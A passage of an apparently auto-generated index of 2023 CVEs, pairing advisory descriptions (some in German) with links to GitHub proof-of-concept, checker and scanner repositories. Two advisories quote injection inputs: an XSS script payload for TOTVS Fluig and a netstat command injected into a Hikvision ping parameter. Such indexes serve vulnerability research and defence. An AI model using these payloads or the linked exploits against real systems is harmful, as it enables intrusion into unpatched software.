An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the extension deployment form, which could lead to arbitrary PHP code execution.
- [pedrojosenavasperez/cve-2023-5966](https://github.com/pedrojosenavasperez/cve-2023-5966)
### CVE-2023-6019 (2023-11-16)
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
- [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019)
- [miguelc49/CVE-2023-6019-2](https://github.com/miguelc49/CVE-2023-6019-2)
- [miguelc49/CVE-2023-6019-1](https://github.com/miguelc49/CVE-2023-6019-1)
- [miguelc49/CVE-2023-6019-3](https://github.com/miguelc49/CVE-2023-6019-3)
- [Clydeston/CVE-2023-6019](https://github.com/Clydeston/CVE-2023-6019)
### CVE-2023-6036 (2024-02-12)
The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
- [pctripsesp/CVE-2023-6036](https://github.com/pctripsesp/CVE-2023-6036)
### CVE-2023-6063 (2023-12-04)
The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
- [motikan2010/CVE-2023-6063-PoC](https://github.com/motikan2010/CVE-2023-6063-PoC)
- [hackersroot/CVE-2023-6063-PoC](https://github.com/hackersroot/CVE-2023-6063-PoC)
- [thesafdari/CVE-2023-6063](https://github.com/thesafdari/CVE-2023-6063)
### CVE-2023-6241 (2024-03-04)
Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r11p0 through r25p0; Valhall GPU Kernel Driver: from r19p0 through r25p0, from r29p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.\n\n
- [s1204IT/CVE-2023-6241](https://github.com/s1204IT/CVE-2023-6241)
### CVE-2023-6246 (2024-01-31)
A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.
- [elpe-pinillo/CVE-2023-6246](https://github.com/elpe-pinillo/CVE-2023-6246)
### CVE-2023-6275 (2023-11-24)
Eine problematische Schwachstelle wurde in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /mobileredir/openApp.jsp der Komponente mobileredir. Dank Manipulation des Arguments redirectUrl/user mit der Eingabe "><script>alert(document.domain)</script> mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.7.1-231128, 1.8.0-231127 and 1.8.1-231127 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [erickfernandox/CVE-2023-6275](https://github.com/erickfernandox/CVE-2023-6275)
### CVE-2023-6289 (2023-12-18)
The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.
- [RandomRobbieBF/CVE-2023-6289](https://github.com/RandomRobbieBF/CVE-2023-6289)
### CVE-2023-6319 (2024-04-09)
A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.\n\n * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA \n\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB \n\n * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA\n\n
- [illixion/root-my-webos-tv](https://github.com/illixion/root-my-webos-tv)
### CVE-2023-6350 (2023-11-29)
Use after free in libavif in Google Chrome prior to 119.0.6045.199 allowed a remote attacker to potentially exploit heap corruption via a crafted avif file. (Chromium security severity: High)
- [dywsy21/CVE-2023-6350_Reproduction](https://github.com/dywsy21/CVE-2023-6350_Reproduction)
### CVE-2023-6421 (2024-01-01)
The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.
- [RandomRobbieBF/CVE-2023-6421](https://github.com/RandomRobbieBF/CVE-2023-6421)
### CVE-2023-6444 (2024-03-11)
The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.
- [Wayne-Ker/CVE-2023-6444-POC](https://github.com/Wayne-Ker/CVE-2023-6444-POC)
### CVE-2023-6538 (2023-12-11)
SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles.
- [Arszilla/CVE-2023-6538](https://github.com/Arszilla/CVE-2023-6538)
### CVE-2023-6553 (2023-12-15)
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.
- [Chocapikk/CVE-2023-6553](https://github.com/Chocapikk/CVE-2023-6553)
- [motikan2010/CVE-2023-6553-PoC](https://github.com/motikan2010/CVE-2023-6553-PoC)
- [kiddenta/CVE-2023-6553](https://github.com/kiddenta/CVE-2023-6553)
- [cc3305/CVE-2023-6553](https://github.com/cc3305/CVE-2023-6553)
### CVE-2023-6567 (2024-01-11)
The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_by’ parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [mimiloveexe/CVE-2023-6567-poc](https://github.com/mimiloveexe/CVE-2023-6567-poc)
### CVE-2023-6595 (2023-12-14)
\nIn WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold.\n\n
- [sharmashreejaa/CVE-2023-6595](https://github.com/sharmashreejaa/CVE-2023-6595)
### CVE-2023-6634 (2024-01-11)
The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.
- [krn966/CVE-2023-6634](https://github.com/krn966/CVE-2023-6634)
### CVE-2023-6654 (2023-12-10)
In PHPEMS 6.x/7.x/8.x/9.0 wurde eine kritische Schwachstelle entdeckt. Betroffen ist eine unbekannte Verarbeitung in der Bibliothek lib/session.cls.php der Komponente Session Data Handler. Dank der Manipulation mit unbekannten Daten kann eine deserialization-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [qfmy1024/CVE-2023-6654](https://github.com/qfmy1024/CVE-2023-6654)
### CVE-2023-6661
- [cli-ish/CVE-2023-6661](https://github.com/cli-ish/CVE-2023-6661)
### CVE-2023-6663
- [cli-ish/CVE-2023-6663](https://github.com/cli-ish/CVE-2023-6663)
### CVE-2023-6700 (2024-02-05)
The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.
- [RandomRobbieBF/CVE-2023-6700](https://github.com/RandomRobbieBF/CVE-2023-6700)
### CVE-2023-6702 (2023-12-14)
Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [kaist-hacking/CVE-2023-6702](https://github.com/kaist-hacking/CVE-2023-6702)
### CVE-2023-6710 (2023-12-12)
A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page.
- [DedSec-47/Metasploit-Exploits-CVE-2023-6710](https://github.com/DedSec-47/Metasploit-Exploits-CVE-2023-6710)
- [DedSec-47/CVE-2023-6710](https://github.com/DedSec-47/CVE-2023-6710)
### CVE-2023-6875 (2024-01-11)
The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.
- [UlyssesSaicha/CVE-2023-6875](https://github.com/UlyssesSaicha/CVE-2023-6875)
- [gbrsh/CVE-2023-6875](https://github.com/gbrsh/CVE-2023-6875)
- [hatlesswizard/CVE-2023-6875](https://github.com/hatlesswizard/CVE-2023-6875)
### CVE-2023-6895 (2023-12-17)
In Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /php/ping.php. Mittels Manipulieren des Arguments jsondata[ip] mit der Eingabe netstat -ano mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.1.0 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [FuBoLuSec/CVE-2023-6895](https://github.com/FuBoLuSec/CVE-2023-6895)
- [nles-crt/CVE-2023-6895](https://github.com/nles-crt/CVE-2023-6895)
### CVE-2023-6933 (2024-02-05)
The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
- [w2xim3/CVE-2023-6933](https://github.com/w2xim3/CVE-2023-6933)
### CVE-2023-6985 (2024-02-05)
The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.
- [RandomRobbieBF/CVE-2023-6985](https://github.com/RandomRobbieBF/CVE-2023-6985)
### CVE-2023-7016 (2024-02-27)
A flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to execute code at a SYSTEM level via local access.
- [ewilded/CVE-2023-7016-POC](https://github.com/ewilded/CVE-2023-7016-POC)
### CVE-2023-7028 (2024-01-12)
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
- [RandomRobbieBF/CVE-2023-7028](https://github.com/RandomRobbieBF/CVE-2023-7028)
- [googlei1996/CVE-2023-7028](https://github.com/googlei1996/CVE-2023-7028)
- [duy-31/CVE-2023-7028](https://github.com/duy-31/CVE-2023-7028)
- [Vozec/CVE-2023-7028](https://github.com/Vozec/CVE-2023-7028)
- [yoryio/CVE-2023-7028](https://github.com/yoryio/CVE-2023-7028)
- [Esonhugh/gitlab_honeypot](https://github.com/Esonhugh/gitlab_honeypot)
- [Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab](https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab)
- [thanhlam-attt/CVE-2023-7028](https://github.com/thanhlam-attt/CVE-2023-7028)
- [Trackflaw/CVE-2023-7028-Docker](https://github.com/Trackflaw/CVE-2023-7028-Docker)
- [mochammadrafi/CVE-2023-7028](https://github.com/mochammadrafi/CVE-2023-7028)
- [hackeremmen/gitlab-exploit](https://github.com/hackeremmen/gitlab-exploit)
- [soltanali0/CVE-2023-7028](https://github.com/soltanali0/CVE-2023-7028)
- [fa-rrel/CVE-2023-7028](https://github.com/fa-rrel/CVE-2023-7028)
### CVE-2023-7172 (2023-12-30)
Eine kritische Schwachstelle wurde in PHPGurukul Hospital Management System 1.0 entdeckt. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Admin Dashboard. Durch Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
- [sharathc213/CVE-2023-7172](https://github.com/sharathc213/CVE-2023-7172)
### CVE-2023-7173 (2023-12-30)
Es wurde eine problematische Schwachstelle in PHPGurukul Hospital Management System 1.0 gefunden. Es geht dabei um eine nicht klar definierte Funktion der Datei registration.php. Durch das Beeinflussen des Arguments First Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [sharathc213/CVE-2023-7173](https://github.com/sharathc213/CVE-2023-7173)
### CVE-2023-20025 (2023-01-19)
A vulnerability in the web-based management interface of Cisco Small Business RV042 Series Routers could allow an unauthenticated, remote attacker to bypass authentication on the affected device.\r\n\r This vulnerability is due to incorrect user input validation of incoming HTTP packets. An attacker could exploit this vulnerability by sending crafted requests to the web-based management interface. A successful exploit could allow the attacker to gain root privileges on the affected device.\r\n
- [lnversed/CVE-2023-20025](https://github.com/lnversed/CVE-2023-20025)
### CVE-2023-20048 (2023-11-01)
A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software.
- [0zer0d4y/FuegoTest](https://github.com/0zer0d4y/FuegoTest)
### CVE-2023-20052 (2023-02-16)
On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed:\r\n\r \r A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device.\r\n\r \r This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.
- [nokn0wthing/CVE-2023-20052](https://github.com/nokn0wthing/CVE-2023-20052)
- [cY83rR0H1t/CVE-2023-20052](https://github.com/cY83rR0H1t/CVE-2023-20052)
### CVE-2023-20073 (2023-04-05)
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
- [RegularITCat/CVE-2023-20073](https://github.com/RegularITCat/CVE-2023-20073)
### CVE-2023-20110 (2023-05-18)
A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database.
- [redfr0g/CVE-2023-20110](https://github.com/redfr0g/CVE-2023-20110)
### CVE-2023-20126 (2023-05-04)
A vulnerability in the web-based management interface of Cisco SPA112 2-Port Phone Adapters could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges. Cisco has not released firmware updates to address this vulnerability.
- [fullspectrumdev/RancidCrisco](https://github.com/fullspectrumdev/RancidCrisco)
### CVE-2023-20178 (2023-06-28)
A vulnerability in the client update process of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM. The client update process is executed after a successful VPN connection is established.\r\n\r This vulnerability exists because improper permissions are assigned to a temporary directory that is created during the update process. An attacker could exploit this vulnerability by abusing a specific function of the Windows installer process. A successful exploit could allow the attacker to execute code with SYSTEM privileges.
- [Wh04m1001/CVE-2023-20178](https://github.com/Wh04m1001/CVE-2023-20178)
### CVE-2023-20198 (2023-10-16)
Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.
- [raystr-atearedteam/CVE-2023-20198-checker](https://github.com/raystr-atearedteam/CVE-2023-20198-checker)
- [Atea-Redteam/CVE-2023-20198](https://github.com/Atea-Redteam/CVE-2023-20198)
- [securityphoenix/cisco-CVE-2023-20198-tester](https://github.com/securityphoenix/cisco-CVE-2023-20198-tester)
- [emomeni/Simple-Ansible-for-CVE-2023-20198](https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198)
- [ZephrFish/CVE-2023-20198-Checker](https://github.com/ZephrFish/CVE-2023-20198-Checker)
- [JoyGhoshs/CVE-2023-20198](https://github.com/JoyGhoshs/CVE-2023-20198)
- [Tounsi007/CVE-2023-20198](https://github.com/Tounsi007/CVE-2023-20198)
- [alekos3/CVE_2023_20198_Detector](https://github.com/alekos3/CVE_2023_20198_Detector)
- [reket99/Cisco_CVE-2023-20198](https://github.com/reket99/Cisco_CVE-2023-20198)
- [iveresk/cve-2023-20198](https://github.com/iveresk/cve-2023-20198)
- [sohaibeb/CVE-2023-20198](https://github.com/sohaibeb/CVE-2023-20198)
- [fox-it/cisco-ios-xe-implant-detection](https://github.com/fox-it/cisco-ios-xe-implant-detection)
- [Pushkarup/CVE-2023-20198](https://github.com/Pushkarup/CVE-2023-20198)
- [Shadow0ps/CVE-2023-20198-Scanner](https://github.com/Shadow0ps/CVE-2023-20198-Scanner)
- [kacem-expereo/CVE-2023-20198](https://github.com/kacem-expereo/CVE-2023-20198)
- [mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner](https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner)
- [ohlawd/CVE-2023-20198](https://github.com/ohlawd/CVE-2023-20198)
- [IceBreakerCode/CVE-2023-20198](https://github.com/IceBreakerCode/CVE-2023-20198)
- [RevoltSecurities/CVE-2023-20198](https://github.com/RevoltSecurities/CVE-2023-20198)
- [smokeintheshell/CVE-2023-20198](https://github.com/smokeintheshell/CVE-2023-20198)
- [netbell/CVE-2023-20198-Fix](https://github.com/netbell/CVE-2023-20198-Fix)
- [Vulnmachines/Cisco_CVE-2023-20198](https://github.com/Vulnmachines/Cisco_CVE-2023-20198)
- [W01fh4cker/CVE-2023-20198-RCE](https://github.com/W01fh4cker/CVE-2023-20198-RCE)
- [sanan2004/CVE-2023-20198](https://github.com/sanan2004/CVE-2023-20198)
- [AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-](https://github.com/AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-)
### CVE-2023-20209 (2023-08-16)
A vulnerability in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read-write privileges on the application to perform a command injection attack that could result in remote code execution on an affected device.\r\n\r This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to establish a remote shell with root privileges.
- [peter5he1by/CVE-2023-20209](https://github.com/peter5he1by/CVE-2023-20209)
### CVE-2023-20273 (2023-10-24)
A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges.
- [smokeintheshell/CVE-2023-20273](https://github.com/smokeintheshell/CVE-2023-20273)
### CVE-2023-20562 (2023-08-08)
\n\n\nInsufficient validation in the IOCTL (Input Output Control) input buffer in AMD uProf may allow an authenticated user to load an unsigned driver potentially leading to arbitrary kernel execution.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
- [zeze-zeze/HITCON-2023-Demo-CVE-2023-20562](https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562)
- [passwa11/HITCON-2023-Demo-CVE-2023-20562](https://github.com/passwa11/HITCON-2023-Demo-CVE-2023-20562)
### CVE-2023-20573 (2024-01-11)
A privileged attacker\ncan prevent delivery of debug exceptions to SEV-SNP guests potentially\nresulting in guests not receiving expected debug information.\n\n\n\n
- [Freax13/cve-2023-20573-poc](https://github.com/Freax13/cve-2023-20573-poc)
### CVE-2023-20593 (2023-07-24)
\nAn issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.\n\n\n\n\n\n\n
- [sbaresearch/stop-zenbleed-win](https://github.com/sbaresearch/stop-zenbleed-win)
### CVE-2023-20598 (2023-10-17)
\n\n\nAn improper privilege management in the AMD Radeon™ Graphics driver may allow an authenticated attacker to craft an IOCTL request to gain I/O control over arbitrary hardware ports or physical addresses resulting in a potential arbitrary code execution.\n\n\n\n
- [H4rk3nz0/CVE-2023-20598-PDFWKRNL](https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL)
### CVE-2023-20860 (2023-03-27)
Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass.
- [limo520/CVE-2023-20860](https://github.com/limo520/CVE-2023-20860)
### CVE-2023-20872 (2023-04-25)
VMware Workstation and Fusion contain an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation.
- [ze0r/vmware-escape-CVE-2023-20872-poc](https://github.com/ze0r/vmware-escape-CVE-2023-20872-poc)
### CVE-2023-20887 (2023-06-07)
Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.
- [sinsinology/CVE-2023-20887](https://github.com/sinsinology/CVE-2023-20887)
- [miko550/CVE-2023-20887](https://github.com/miko550/CVE-2023-20887)
- [Malwareman007/CVE-2023-20887](https://github.com/Malwareman007/CVE-2023-20887)
### CVE-2023-20909 (2023-04-19)
In multiple functions of RunningTasks.java, there is a possible privilege escalation due to a missing privilege check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-243130512
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909)
- [Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909)
### CVE-2023-20911 (2023-03-24)
In addPermission of PermissionManagerServiceImpl.java , there is a possible failure to persist permission settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-242537498
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911)
### CVE-2023-20918 (2023-07-12)
In getPendingIntentLaunchFlags of ActivityOptions.java, there is a possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918)
- [Trinadh465/platform_frameworks_base_CVE-2023-20918](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-20918)
### CVE-2023-20921 (2023-01-24)
In onPackageRemoved of AccessibilityManagerService.java, there is a possibility to automatically grant accessibility services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243378132
- [Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921](https://github.com/Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921)
### CVE-2023-20933 (2023-02-28)
In several functions of MediaCodec.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-245860753
- [Trinadh465/frameworks_av_CVE-2023-20933](https://github.com/Trinadh465/frameworks_av_CVE-2023-20933)
- [hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933](https://github.com/hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933)
### CVE-2023-20943 (2023-02-28)
In clearApplicationUserData of ActivityManagerService.java, there is a possible way to remove system files due to a path traversal error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-240267890
- [Trinadh465/frameworks_base_CVE-2023-20943](https://github.com/Trinadh465/frameworks_base_CVE-2023-20943)
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943)
### CVE-2023-20944 (2023-02-28)
In run of ChooseTypeAndAccountActivity.java, there is a possible escalation of privilege due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-244154558
- [Trinadh465/frameworks_base_CVE-2023-20944](https://github.com/Trinadh465/frameworks_base_CVE-2023-20944)
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944)
### CVE-2023-20945 (2023-02-28)
In phNciNfc_MfCreateXchgDataHdr of phNxpExtns_MifareStd.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-246932269
- [Ailenchick/CVE-2023-20945](https://github.com/Ailenchick/CVE-2023-20945)
### CVE-2023-20955 (2023-03-24)
In onPrepareOptionsMenu of AppInfoDashboardFragment.java, there is a possible way to bypass admin restrictions and uninstall applications for all users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-258653813
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955)
### CVE-2023-20963 (2023-03-24)
In WorkSource, there is a possible parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-220302519
- [pwnipc/BadParcel](https://github.com/pwnipc/BadParcel)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963)
- [Ailenchick/CVE-2023-20963](https://github.com/Ailenchick/CVE-2023-20963)
### CVE-2023-21036 (2023-03-24)
In BitmapExport.java, there is a possible failure to truncate images due to a logic error in the code.Product: AndroidVersions: Android kernelAndroid ID: A-264261868References: N/A
